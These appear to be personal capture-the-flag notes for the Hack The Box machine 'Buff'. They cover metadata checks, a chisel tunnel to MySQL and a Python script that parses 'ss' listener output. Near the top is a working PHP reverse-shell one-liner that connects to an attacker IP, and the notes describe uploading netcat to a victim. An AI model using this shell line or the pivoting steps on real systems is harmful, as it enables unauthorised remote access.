HTB buff notes
- When you see images, try downloading them and analyzing the metadata.
- wget image_URL
- exiftool image.img
- Check the modification time in the metadata.
- php -r '$sock=fsockopen("10.10.14.8",81);exec("/bin/sh -i <&3 >&3 2>&3");'
Get-Content - shows the contents of a file (PowerShell)
tasklist - lists all running processes
Upload nc.exe to the victim
nc.exe -zv localhost 8888
(connects to port 8888 on the target itself to check whether the local service answers)
- 1. Download both the Linux and Windows 64-bit .gz releases.
- 2. gunzip them and rename them to whatever you want.
- 3. Transfer the Windows binary to the Windows target machine.
- 4. On Kali, gunzip the Linux file and chmod +x it. Start it with the following (if an error happens, the port is already in use):
./chisel server --reverse --port 9002
- 5. On Windows:
.\chisel.exe client IP:9002 R:3306:localhost:3306
Now that the tunnel is set up, we can connect to the SQL server via localhost:3306:
nc localhost 3306
You do want to have MySQL credentials before connecting.
Look into /include for passwords.
mysql -u root -p -h 127.0.0.1 (no password, just press Enter at the prompt)
-> show databases;
-> use database_name; # selects a database
-> show tables; describe table_name; # lists tables / shows columns
(you can make sure the tunnel is up on your side with "ss -lnpt | grep 3306")
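The ss check above only greps for a port number. The script below is an added example (not from these notes, not chisel's own code) that parses the `ss -lnpt` output into structured records, so you can confirm that the forwarded port is owned by the process you expect and bound only to loopback, and so you can list every listener that is exposed on all interfaces. The sample output is constructed for the example and is not captured from the box; the process names, PIDs and ports in it are assumptions.

```python
"""Parse `ss -lnpt` output and report where each listener is bound."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of `ss -lnpt` output (not captured from a real host).
# With -t only, ss prints no protocol column.
SAMPLE_SS_OUTPUT = """State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       4096    127.0.0.1:3306       0.0.0.0:*          users:(("chisel",pid=4242,fd=7))
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=811,fd=3))
LISTEN  0       4096    *:9002               *:*                users:(("chisel",pid=4242,fd=8))
LISTEN  0       128     [::1]:631            [::]:*             users:(("cupsd",pid=900,fd=6))
"""

# Matches the first ("name",pid=N) pair inside the Process column.
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')


@dataclass
class Listener:
    addr: str
    port: int
    process: Optional[str]
    pid: Optional[int]

    @property
    def loopback(self) -> bool:
        """True when the socket is reachable only from the host itself."""
        return self.addr.startswith("127.") or self.addr in ("[::1]", "::1")


def parse_ss(text: str) -> List[Listener]:
    """Turn `ss -lnpt` output into Listener records, skipping the header."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        # Header line starts with "State"; only LISTEN rows are of interest.
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        # Local address is "addr:port"; rpartition keeps IPv6 brackets intact.
        addr, _, port = fields[3].rpartition(":")
        match = PROC_RE.search(fields[5]) if len(fields) > 5 else None
        listeners.append(
            Listener(
                addr=addr,
                port=int(port),
                process=match.group(1) if match else None,
                pid=int(match.group(2)) if match else None,
            )
        )
    return listeners


def find_listener(listeners: List[Listener], port: int) -> Optional[Listener]:
    """Return the listener on the given port, or None if nothing is bound."""
    for listener in listeners:
        if listener.port == port:
            return listener
    return None


def exposed_listeners(listeners: List[Listener]) -> List[Listener]:
    """Listeners bound to a non-loopback address, i.e. reachable from the network."""
    return [listener for listener in listeners if not listener.loopback]


if __name__ == "__main__":
    found = parse_ss(SAMPLE_SS_OUTPUT)
    tunnel = find_listener(found, 3306)
    if tunnel is None:
        print("port 3306 is not listening; the chisel client has not connected")
    else:
        scope = "loopback only" if tunnel.loopback else "ALL interfaces"
        print(f"3306 owned by {tunnel.process} (pid {tunnel.pid}), bound {scope}")
    for listener in exposed_listeners(found):
        print(f"exposed: {listener.addr}:{listener.port} ({listener.process})")
```

Run it against live output with `ss -lnpt | python3 ss_check.py` after swapping `SAMPLE_SS_OUTPUT` for `sys.stdin.read()`. The reverse-forwarded MySQL port should show up as owned by chisel and bound to 127.0.0.1; anything the script lists as exposed is a listener the whole network can reach.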